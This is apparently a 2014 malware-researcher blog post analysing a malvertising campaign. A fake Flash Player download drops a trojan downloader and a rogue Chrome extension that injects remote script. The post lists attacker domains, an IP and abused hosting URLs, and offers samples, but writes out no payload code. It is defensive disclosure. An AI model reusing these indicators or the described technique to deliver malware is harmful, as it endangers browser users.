2014-02-23

Today, I almost went to bed when bumping into this threat. Please kindly bear the sleepy eyes on writing these. I am combining the screenshot and log/details in texts, hopefully there will be no filtration product would block this post for a bit of URL's paste.

This writing contains many points that are important information for fellow friends and the mentioned public services to be aware of being abused by this malware infection session. So I wrote this as fast as possible and leaving payload binary analysis and exploit analysis in a rain check. To anyone who can help to contact the related abuse, is very highly appreciated.

Infection Source:

First of all. The source of infection is the malware infection code/scripts that was implemented in the below IP and domain, located in OVH network, in France, I really hope to have help from France friends to clean this IP from any malware infector toolkits installed:


Secondly, the infector, is starting from Japan's IP under domain: shortening .biz

This needs to be cleaned up too, yet I think there are more infectors exist..

The background

It started when checking a suspicious URL, accessed it in the browser as per below:


I regenerated with the separate scheme to record the below log (for the source of infection details purpose), just to make sure that we had everything in our hands:

Back to the browser, in the short while the browser's address bar flickering to the redirection URL as per below:

And this act is confirmed by the series of the html tag meta refresh code grepped below:

What happened next? I was being forwarded into a page with video of "a lady in the bed" as per captured below:

I just about to praise on how fortunate I am.. but the video soon got stopped and the warning message came up with popping the download of the Flash Player Setup.. as per shown below:

The Path to Payload
Back to the shell, I simulated the download page for evidence:

And that was giving me the below script actually:

And now we know why I got that redirection, the dropboxusercontent.com (the very bottom link) is serving the infection landing page and I was redirected into it. Will explain this later on. And there are other conditions for another redirection, for the mobile access and Opera browser in the GOO.GL short URL. Anyway if we extract those Short URL for Mobile and Opera browser we'll find the better image:

(I will have to leave other friends to check those two links deeper..)
The further research in the blacklisted URL found the below Amazon AWS abused account (sorted by history) by the same threat:

And this is the malware file downloaded if you are matching to the desired condition:

Now this payload is well detected by AV industry as per shown in VirusTotal result here-->>[link]
If you run the payload you will get the query and response in HTTP as follows:

And this payload is downloading a "config" with the info on hash and URL of another malware, as per shown here:

Here's that "guncel.exe" malware download session in my shell..a simple wget will do..This could be the updates or sort of.

This is the VirusTotal report of the "guncel.exe", is the same file as original payload, it is also as an evidence explaining that the origin of the payload is wjetphp.com (46.105.55.251)-->>[link], the detection rates as the VBA basis Trojan Downloader is not so bad after all, good work.

Below is interesting trace of what this malware did in the memory:

This is just some traces of VBA calls used..(during the creation of registry key)

Quick analysis that might help fellow researchers and infected victims:

The payload will download the background.js JavaScript w/URL planted in the binary, as per traffic below:

Which is having the script as I pasted here-->>[link]
↑You can see clearly the malicious traffic redirection scheme and access URL to the landing page (origin of the infection), in that script..

The next traffic will explain how this background.js is called, the file manifest.json was downloaded, it contains the script to show how background.js is executed by setting several security privileges for the execution of the script itself..

You can see the effort to fake "Google Shockwave Player" (any such product??) upon the execution of background.js above? Things are starting to make much sense on why so many Google related "images" are used here.

PS: I will add some more reversing notes later on, but shall we move on a bit..too little time..for there are more important parts to cover..

What happened if we simulate the landing page access in shell is something like this:

How I got the payload being downloaded then?? Let's see the code inside the page. Well..It seems like I got hit by the timer function stated by this code:

The Google short URL is again being used to hide the real malware payload URL which is served in the Google Code SVN download!!

The download log can be seen in the follow up section..

Well..the bad guy behind this is really trying hard to convince victim about the Google kind of application is installed :-)

Some reversing & investigation notes

I used recent sample in an abused Google Code SVN here:

The sample is in VT here-->[link]

Straight to the point: A reversing effort showing the CNC masked in binary strings:

The User Name :-))

Maybe we'll need these later, just in case, noted:

Next. Following the trails of that CnC URL, to find the junk used:

Now we can see the code clearly, instead of the PCAP data :-D
See the dates well, the crook was recently modifying the background.js malicious script.
It has the background.js and manifest.json code snipped below:

As per explained way up above, the JSON is used for execution of background.js. We didn't have a a chance to disclose background.js clearly before, so this is it, a fresh one. First, the beautified full code of the bakcground.js is:

If you see what I see, the attacker is aiming Google Chrome browser, by abusing its API (chrome.tabs) to interact with the browser's tab system. You can use this API to create, modify, and rearrange tabs in the browser. Anyway, what he did is on "devtools://" index/tab, he programmed to execute remote script via chrome.tabs.executeScript command to www.saatlikrapor .com/ext/s.php, which this was BAD (gone now-->link and link) in . Either this crook loves Google so much or hates Google that much.. since now we know he is aiming Google chrome browser's end user too.

PS: The saatlikrapor.com domain is hidden behind cloudfare:

This is the domain information, a shiny brand new one:

And how about the CnC used? akillitelefonburada.com ; SAME pattern! :-) behind cloudflare..

And under below registration details:

We will have to deal with the Turkish law enforcement to nail this guy for good:

No, no, it is NOT a hacking site: (Pls don't give me that preach..)

Updates

The domain of WJETPHP.COM which was informed in the top section as the "payload center" (red: CNC) also still alive now with the below details:

As you see, he is still hiding his service behind the cloud flare until now (read: cloud flare's customer).

Moreover, the ownership of the domains:

Conclusion

How to conclude this matter generally? Obviously the public well-known internet services was targeted to spread this infection. Let me describe how many of those abused services spotted in this single case:
Number one, amazonaws.com (property of Amazon AWS) is utilised by this actor for the etc bad purpose scheme (see the mobile link and Opera browser link on the above explanation, whatever it is, is not a good thing), we'd better warn Amazon AWS for this link.
Number two is, dropboxusercontent.com (property of Dropbox, Inc) is also utilised to serve payload malware.
Is that all? No. Number three: see the domain in payload URL, googlecode.com, it is the abuse of Google Code's SVN facility.
More? Yes, the last one, number four, goo.gl service, the Google ShortURL is also abused to hide the URL of the malware payload.

The Google code is being abused to serve malware payloads of this threat's series for quite a while, you can view the reports posted by our friend ‏@sarimura (twitter) to the Project Hosting on Google Code in Google groups-->[here]. It shows how persistent the malware actor to always create a new google project and to use its download URL to serve the malware payloads. On the other hand it shows that the bad actor(s) is leaving many traces in Google Code servers during uploading the payloads (account ID, IP addresses, etc).. a hint to follow isn't it?

Sample

I share all sample, under usual password, click the picture below to download:

Moral of the story: Our beloved internet and its services are badly abuse by malware. Stay safe please!
PS: Comments and additional are to be added in follow up section! And it looks like this threat is bigger than expected so I could't sleep again, gotta go to day work now!

Updates: How bad the abuse & this malvertisement is?

The bad actor is keep on changing users in AmazonAWS and Google code to serve the next malicious payload.The new abused AmazonAWS page is:
unluvideolari.s3.amazonaws .com/unlu.html URLQuery-->[link]

PoC of how bad the malware download is:

Another PoC:

The recent Google Code SVN that's being abused:

Google set a good work-around by 401 authentication:

Or the 403:

Now Emerging Threat is releasing a signature that can be used to identify this malware download:

Update Info Credit: @sarimura (twitter), signature: Emerging Threat & @node5 (twitter), test & checks: @urlquery (twitter), thank's to Google to keep on nuking down the bad accounts and nice stats of the sort URL.

Follow Up

Please help suspend user "buexe-x" of GoogleCode, he is spreading malware in via SVN - Attached=download log >@Google pic.twitter.com/FT8cXTFFkg

— MalwareMustDie, NPO (@MalwareMustDie) February 24, 2014

To: @sakura_server 添付した画像に書いたサイトがマルウェア感染に悪用されているので、IPはさくらさんのVPSで、ご対応は可能ですか?そのURLから今大変な事になっていた→ http://t.co/D6wJsYHCQf pic.twitter.com/2168JDJyBN

— Hendrik ADRIAN (@unixfreaxjp) February 24, 2014

Great follow, thank's for always fast in responses!

@unixfreaxjp ご連絡ありがとうございます。確認いたします。

— さくらインターネット開発の中の人(α) (@sakura_server) February 24, 2014

@MalwareMustDie I have been reporting files on @googlecode and they have ignored the last report, apparently: https://t.co/SubFwB6Lc4

— Salim Sarımurat (@sarimura) February 24, 2014

Thank's @EmergingThreats for releasing: 2018191 – ET CURRENT_EVENTS SUSPICIOUS .exe Downloaded from SVN/HTTP on GoogleCode (current_events)

— MalwareMustDie, NPO (@MalwareMustDie) February 27, 2014

AwazonAWSとGooglecodeのSVN経由マルウェア感染仕組みが未だ続けている http://t.co/7pkuqYkx1Z
どうやっても止められなさそう、潰しても直ぐに出てくる。
国内にもご注意を!

— Hendrik ADRIAN (@unixfreaxjp) February 27, 2014

#MalwareMustDie!

Show more